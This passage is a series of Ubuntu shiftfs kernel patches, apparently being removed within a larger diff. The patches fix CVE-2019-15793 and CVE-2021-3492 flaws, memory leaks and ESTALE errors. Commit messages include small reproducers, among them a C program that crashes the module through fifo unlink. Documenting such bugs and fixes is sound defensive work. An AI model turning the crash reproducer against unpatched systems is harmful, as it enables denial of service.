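- static long from_k(const struct ns_map *ns, unsigned kid)
- {
-         if (kid < ns->base || kid - ns->base >= ns->count)
-                 return -1;
-         return kid - ns->base + ns->lower;
- }
-
- /* make_kuid() analogue: id inside the ns -> kernel id, or -1 */
- static long make_k(const struct ns_map *ns, unsigned id)
- {
-         if (id < ns->lower || id - ns->lower >= ns->count)
-                 return -1;
-         return id - ns->lower + ns->base;
- }
-
- int main(void)
- {
-         struct ns_map from = { .base = 100000, .lower = 0, .count = 65536 };
-         struct ns_map to   = { .base = 200000, .lower = 0, .count = 65536 };
-
-         long uid = from_k(&from, 100001);          /* kuid -> uid 1 in "from" */
-         long shifted = make_k(&to, (unsigned)uid); /* uid 1 -> kuid in "to" */
-         printf("100001 -> %ld -> %ld\n", uid, shifted); /* 1 -> 200001 */
-         return 0;
- }
-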
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15793
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
- 1 file changed, 23 insertions(+), 20 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 897e0163005e..04fba4689eb6 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
- 	put_cred(newcred);
- }
- 
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
-+}
-+
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
-+{
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
-+
- static int shiftfs_override_object_creds(const struct super_block *sb,
- 					 const struct cred **oldcred,
- 					 struct cred **newcred,
- 					 struct dentry *dentry, umode_t mode,
- 					 bool hardlink)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	if (!hardlink) {
- 		int err = security_dentry_create_files_as(dentry, mode,
-@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 	return 0;
- }
- 
--static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
--			 kuid_t kuid)
--{
--	uid_t uid = from_kuid(from, kuid);
--	return make_kuid(to, uid);
--}
--
--static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
--			 kgid_t kgid)
--{
--	gid_t gid = from_kgid(from, kgid);
--	return make_kgid(to, gid);
--}
--
- static void shiftfs_copyattr(struct inode *from, struct inode *to)
- {
- 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
- 	err = setattr_prepare(dentry, attr);
-@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 		return err;
- 
- 	newattr = *attr;
--	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
--	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
-+	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
- 
- 	/*
- 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	/* clear all caps to prevent bypassing capable() checks */
- 	cap_clear((*newcred)->cap_bset);
--- 
-2.39.2
-
-From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 17 Jan 2020 16:17:06 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
- negative during unlink
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1860041
-
-All non-special files go through shiftfs_open() and have their dentry
-pinned through this codepath, preventing it from going negative. (For
-shiftfs the special files are only fifos and - in this case - unix
-sockets, since we don't allow character and block devices to be
-created.) But fifos don't use the shiftfs fops; they use the
-pipefifo_fops instead, which means they do not go through
-shiftfs_open() and thus don't have their dentry pinned that way. The
-lower dentries for such files can therefore go negative on unlink,
-causing segfaults. The following C program reproduces the crash:
-
- #include <stdio.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <unistd.h>
- #include <stdlib.h>
-
- int main(int argc, char *argv[])
- {
-        struct stat stat;
-
-        unlink("./bbb");
-
-        int ret = mknod("./bbb", S_IFIFO|0666, 0);
-        if (ret < 0)
-                exit(1);
-
-        int fd = open("./bbb", O_RDWR);
-        if (fd < 0)
-                exit(2);
-
-        if (unlink("./bbb"))
-                exit(4);
-
-        fstat(fd, &stat);
-
-        return 0;
- }
-
-Similar to ecryptfs we need to dget() the lower dentry before calling
-vfs_unlink() on it and dput() it afterwards.
-
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 04fba4689eb6..3623d02b061e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	int err;
- 	const struct cred *oldcred;
- 
-+	dget(lowerd);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
-@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	inode_unlock(loweri);
- 
- 	shiftfs_copyattr(loweri, dir);
-+	dput(lowerd);
- 
- 	return err;
- }
--- 
-2.39.2
-
-From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 10 Apr 2020 16:55:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872094
-
-When shiftfs is nested we failed to create any files or access
-directories because we recorded the wrong creator credentials. We need
-to record the credentials of the creator of the lower mark mount of
-shiftfs; otherwise we aren't privileged with respect to the shiftfs
-layer in the nesting case. This is similar to how we always record the
-user namespace of the base filesystem.
-
-Suggested-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 17 +++++++++--------
- 1 file changed, 9 insertions(+), 8 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3623d02b061e..5c39529d0a17 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * parent mark mountpoint.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
-+			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * are identical.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
--		}
- 
--		cred_tmp = prepare_creds();
--		if (!cred_tmp) {
--			err = -ENOMEM;
--			goto out_put_path;
-+			cred_tmp = prepare_creds();
-+			if (!cred_tmp) {
-+				err = -ENOMEM;
-+				goto out_put_path;
-+			}
-+			/* Don't override disk quota limits or use reserved space. */
-+			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+			sbinfo->creator_cred = cred_tmp;
- 		}
--		/* Don't override disk quota limits or use reserved space. */
--		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
--		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 20 May 2020 13:44:27 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes
- from other users
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1879688
-
-Stéphane reported a bug found during NorthSec, which makes heavy use
-of shiftfs. When a subvolume or snapshot is created as userns root in
-the container and then chowned to another user, a delete as the root
-user will fail. The reason is that we drop all capabilities as a
-safety measure before calling btrfs ioctls. The only workable fix I
-could think of is to retain the CAP_DAC_OVERRIDE capability for the
-BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more
-invasive.
-
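-A toy model of the resulting policy - clear every capability, then
-re-raise exactly one bit for exactly one command (the ioctl number and
-capability bit below are stand-ins, not the real kernel values):
-
- #include <stdio.h>
-
- #define CAP_DAC_OVERRIDE_BIT (1u << 1) /* stand-in for the capability bit */
- #define SNAP_DESTROY 0x5010u           /* stand-in ioctl number */
-
- static unsigned ioctl_caps(unsigned cmd, int is_userns_root)
- {
-         unsigned caps = 0;  /* cap_clear(): drop everything by default */
-
-         if (cmd == SNAP_DESTROY && is_userns_root)
-                 caps |= CAP_DAC_OVERRIDE_BIT;  /* the single exception */
-         return caps;
- }
-
- int main(void)
- {
-         printf("%#x\n", ioctl_caps(SNAP_DESTROY, 1)); /* 0x2 */
-         printf("%#x\n", ioctl_caps(0x5001u, 1));      /* 0 */
-         return 0;
- }
-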
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 ++++++++++++--
- 1 file changed, 12 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5c39529d0a17..5d88193b41db 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
- 	return ret;
- }
- 
--static int shiftfs_override_ioctl_creds(const struct super_block *sb,
-+static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 	cap_clear((*newcred)->cap_inheritable);
- 	cap_clear((*newcred)->cap_permitted);
- 
-+	if (cmd == BTRFS_IOC_SNAP_DESTROY) {
-+		kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
-+		/*
-+		 * Allow the root user in the container to remove subvolumes
-+		 * from other users.
-+		 */
-+		if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
-+			cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
-+	}
-+
- 	put_cred(override_creds(*newcred));
- 	return 0;
- }
-@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	if (ret)
- 		goto out_restore;
- 
--	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
-+	ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
- 	if (ret)
- 		goto out_fdput;
- 
--- 
-2.39.2
-
-From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Mon, 15 Jun 2020 15:16:11 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing
- fiemap definitions
-Cc: mpagano@gentoo.org
-
-shiftfs FTBFS with 5.8-rc1:
-
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap':
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info'
- /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'?
-
-It seems that shiftfs was getting linux/fiemap.h included
-indirectly before. Include it directly.
-
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 5d88193b41db..f9a5c94a9793 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -20,6 +20,7 @@
- #include <linux/posix_acl.h>
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
-+#include <linux/fiemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 436cc946e1acb3833c41e6a7df3239f5f559369a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Tue, 23 Jun 2020 19:46:16 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent ESTALE for LOOKUP_JUMP
- lookups
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872757
-
-Users reported that creating temporary files shiftfs reports ESTALE.
-This can be reproduced via:
-
-import tempfile
-import os
-
-def test():
-    with tempfile.TemporaryFile() as fd:
-        fd.write("data".encode('utf-8'))
-        # re-open the file to get a read-only file descriptor
-        return open(f"/proc/self/fd/{fd.fileno()}", "r")
-
-def main():
-   fd = test()
-   fd.close()
-
-if __name__ == "__main__":
-    main()
-
-a similar issue was reported here:
-https://github.com/systemd/systemd/issues/14861
-
-Our revalidate methods were very opinionated about whether or not a
-lower dentry was valid; in particular, when it became unlinked we
-simply invalidated the lower dentry, which caused the above bug to
-surface. This led to bugs where ESTALE was returned for e.g. temporary
-files that were created and directly re-opened afterwards through
-/proc/<pid>/fd/<nr-of-deleted-file>. When a file is re-opened through
-/proc/<pid>/fd/<nr>, LOOKUP_JUMP is set and the vfs revalidates via
-d_weak_revalidate(). Since the file had been unhashed or had even
-already gone negative, we'd fail the open when we should have
-succeeded.
-
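-A C analogue of the reproducer above (assumes a writable current
-directory): create a file, unlink it, then re-open the deleted file
-through /proc/self/fd - the LOOKUP_JUMP path that used to fail with
-ESTALE:
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <fcntl.h>
- #include <unistd.h>
-
- int main(void)
- {
-         char path[64];
-         int fd, rd;
-
-         fd = open("tmpfile", O_RDWR | O_CREAT, 0600);
-         if (fd < 0)
-                 exit(1);
-         if (write(fd, "data", 4) != 4 || unlink("tmpfile"))
-                 exit(2);
-
-         snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
-         rd = open(path, O_RDONLY);  /* re-open the now-deleted file */
-         printf("re-open via %s: %s\n", path, rd < 0 ? "failed" : "ok");
-         return rd < 0;
- }
-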
-Reported-by: Christian Kellner <ckellner@redhat.com>
-Reported-by: Evgeny Vereshchagin <evvers@ya.ru>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Link: https://github.com/systemd/systemd/issues/14861
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ----
- 1 file changed, 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index f9a5c94a9793..3cfd1881e9a2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
-@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- 		struct inode *loweri = d_inode(lowerd);
- 
- 		shiftfs_copyattr(loweri, inode);
--		if (!inode->i_nlink)
--			err = 0;
- 	}
- 
- 	return err;
--- 
-2.39.2
-
-From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 30 Dec 2020 11:10:20 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11
-Cc: mpagano@gentoo.org
-
-After commit:
-
- 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter")
-
-__close_fd() has been renamed to close_fd() and the files parameter has
-been removed.
-
-Update the shiftfs code accordingly.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3cfd1881e9a2..4f1d94903557 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	__close_fd(current->files, fd);
-+	close_fd(fd);
- 	kfree(v1);
- 	kfree(v2);
- 
-@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	/*
- 	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
- 	 * take a reference here to offset the one which will be put by
--	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 * close_fd(), and make sure that reference is put on fdput(lfd).
- 	 */
- 	get_file(lfd.file);
- 	lfd.flags |= FDPUT_FPUT;
--- 
-2.39.2
-
-From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:01:06 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in
- shiftfs_btrfs_ioctl_fd_replace() error paths
-Cc: mpagano@gentoo.org
-
-Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory
-allocated near the top of the function. Fix up these error paths to free
-the memory.
-
-Additionally, the addresses for the allocated memory are assigned to
-return parameters early in the function, before we know whether or not
-the function as a whole will return success. Wait to assign these values
-until we know the function was successful, and for good measure
-initialize the return parameters to NULL at the start.
-
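-A generic userspace sketch of the pattern the fix moves to - allocate,
-hand pointers to the caller only on success, and funnel every failure
-through one cleanup label (illustrative only, not the shiftfs code
-itself):
-
- #include <stdlib.h>
- #include <string.h>
-
- static int make_bufs(char **out1, char **out2)
- {
-         char *a = NULL, *b = NULL;
-
-         *out1 = *out2 = NULL;   /* no stale values on failure */
-
-         a = malloc(16);
-         if (!a)
-                 goto err_free;
-         b = malloc(16);
-         if (!b)
-                 goto err_free;
-
-         strcpy(a, "one");
-         strcpy(b, "two");
-         *out1 = a;              /* assign return parameters only on success */
-         *out2 = b;
-         return 0;
-
- err_free:
-         free(a);                /* free(NULL) is a no-op */
-         free(b);
-         return -1;
- }
-
- int main(void)
- {
-         char *x, *y;
-         int ret = make_bufs(&x, &y);
-
-         free(x);
-         free(y);
-         return ret ? 1 : 0;
- }
-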
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 28 +++++++++++++++++++++-------
- 1 file changed, 21 insertions(+), 7 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4f1d94903557..8eab93691d62 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-+	*b1 = NULL;
-+	*b2 = NULL;
-+
- 	if (!is_btrfs_snap_ioctl(cmd))
- 		return 0;
- 
-@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		if (IS_ERR(v1))
- 			return PTR_ERR(v1);
- 		oldfd = v1->fd;
--		*b1 = v1;
- 	} else {
- 		v2 = memdup_user(arg, sizeof(*v2));
- 		if (IS_ERR(v2))
- 			return PTR_ERR(v2);
- 		oldfd = v2->fd;
--		*b2 = v2;
- 	}
- 
- 	src = fdget(oldfd);
--	if (!src.file)
--		return -EINVAL;
-+	if (!src.file) {
-+		ret = -EINVAL;
-+		goto err_free;
-+	}
- 
- 	ret = shiftfs_real_fdget(src.file, &lfd);
- 	if (ret) {
- 		fdput(src);
--		return ret;
-+		goto err_free;
- 	}
- 
- 	/*
-@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
- 		fdput(lfd);
--		return *newfd;
-+		ret = *newfd;
-+		goto err_free;
- 	}
- 
- 	fd_install(*newfd, lfd.file);
-@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		v2->fd = oldfd;
- 	}
- 
--	if (ret)
-+	if (!ret) {
-+		*b1 = v1;
-+		*b2 = v2;
-+	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+	}
-+
-+	return ret;
-+
-+err_free:
-+	kfree(v1);
-+	kfree(v2);
- 
- 	return ret;
- }
--- 
-2.39.2
-
-From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 9 Apr 2021 13:10:37 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values
- correctly
-Cc: mpagano@gentoo.org
-
-shiftfs expects copy_to_user() to return a negative error code on
-failure, but it actually returns the number of uncopied bytes. Fix all
-code using copy_to_user() to handle the return value correctly.
-
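-A userspace model of the convention at issue: the copier returns the
-number of bytes NOT copied, so callers must map any nonzero result
-to -EFAULT rather than returning it directly (toy code, not the
-kernel implementation):
-
- #include <stdio.h>
- #include <string.h>
-
- #define EFAULT 14
-
- /* like copy_to_user(): returns 0 on success, else bytes left uncopied */
- static unsigned long copy_out(void *dst, const void *src,
-                               unsigned long n, unsigned long ok)
- {
-         unsigned long done = n < ok ? n : ok;  /* "ok" simulates a fault */
-
-         memcpy(dst, src, done);
-         return n - done;
- }
-
- int main(void)
- {
-         char dst[8], src[8] = "payload";
-         long ret;
-
-         ret = copy_out(dst, src, sizeof(src), 4) ? -EFAULT : 0;
-         printf("ret = %ld\n", ret);  /* -14: partial copy became -EFAULT */
-         return 0;
- }
-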
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-CVE-2021-3492
-Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8eab93691d62..abeb7db3b9be 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 	kfree(v1);
- 	kfree(v2);
- 
--	return ret;
-+	return ret ? -EFAULT: 0;
- }
- 
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 		*b2 = v2;
- 	} else {
- 		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
-+		ret = -EFAULT;
- 	}
- 
- 	return ret;
--- 
-2.39.2
-
-From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Mon, 9 Aug 2021 17:15:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1939301
-
-Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops")
-caused a regression for us. It states:
-
-> default_file_splice_write is the last piece of generic code that uses
-> set_fs to make the uaccess routines operate on kernel pointers.  It
-> implements a "fallback loop" for splicing from files that do not actually
-> provide a proper splice_read method.  The usual file systems and other
-> high bandwidth instances all provide a ->splice_read, so this just removes
-> support for various device drivers and procfs/debugfs files.  If splice
-> support for any of those turns out to be important it can be added back
-> by switching them to the iter ops and using generic_file_splice_read.
-
-this means that currently all workloads making use of sendfile() on
-shiftfs fail. This includes LXD, Anbox and a range of others. Fix this
-by providing explicit .splice_read() and .splice_write() methods, which
-just restores the status quo: we keep using the generic methods
-provided by the vfs.
-
-Cc: Seth Forshee <sforshee@kernel.org>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index abeb7db3b9be..f5f6d8d8144e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.copy_file_range	= shiftfs_copy_file_range,
- 	.remap_file_range	= shiftfs_remap_file_range,
-+	.splice_read		= generic_file_splice_read,
-+	.splice_write		= iter_file_splice_write,
- };
- 
- const struct file_operations shiftfs_dir_operations = {
--- 
-2.39.2
-
-From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Thu, 20 Jan 2022 16:55:24 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15
-Cc: mpagano@gentoo.org
-
-WARNING: after this change we may see some regressions if shiftfs is
-used with filesystem namespaces.
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++---------------------
- 1 file changed, 64 insertions(+), 43 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
